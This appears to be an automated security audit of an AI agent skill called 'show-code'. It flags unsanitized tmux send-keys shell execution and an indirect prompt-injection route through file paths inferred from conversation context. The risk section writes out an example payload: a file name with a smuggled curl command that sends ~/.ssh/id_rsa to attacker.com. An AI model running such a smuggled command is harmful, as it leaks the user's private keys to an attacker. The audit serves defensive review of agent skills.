skills/acron0/skills/show-code/Gen Agent Trust Hub

show-code

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
  • COMMAND_EXECUTION (HIGH): The skill uses tmux send-keys to execute commands in a shell environment. This is inherently dangerous as the keystrokes are processed as shell input.
      • Evidence: Found in SKILL.md in the open-editor step: tmux send-keys -t TARGET_PANE 'EDITOR +LINE FILEPATH && exit' Enter. There is no escaping or sanitization of the EDITOR, LINE, or FILEPATH variables before they are piped into the terminal.
  • PROMPT_INJECTION (HIGH): The skill is highly susceptible to indirect prompt injection (Category 8).
      • Ingestion points: Inferred absolute file paths and line numbers from the 'conversation context' (Step: identify-target).
      • Capability inventory: Unrestricted shell access in the user's terminal via a tmux pane.
      • Sanitization: Absent. The skill instructions do not include any steps to validate or escape characters like backticks, semicolons, or pipes in the inferred file paths.
      • Boundary markers: Absent. The agent is directed to resolve the path from context without delimiters or integrity checks.
      • Risk: An attacker could influence the conversation context (e.g., via a malicious code comment or a file name in a repository) to include a payload like file.txt; curl http://attacker.com/leak?data=$(cat ~/.ssh/id_rsa), which the agent would then 'open' in the terminal, triggering the payload.
  • DATA_EXPOSURE (LOW): The skill reads and modifies a local configuration file.
      • Evidence: Step resolve-editor reads and writes to ~/.claude/preferences.json to store the user's choice of editor.
Recommendations
  • AI detected serious security threats
Audit Metadata
  • Risk Level: HIGH
  • Analyzed: Feb 16, 2026, 09:35 AM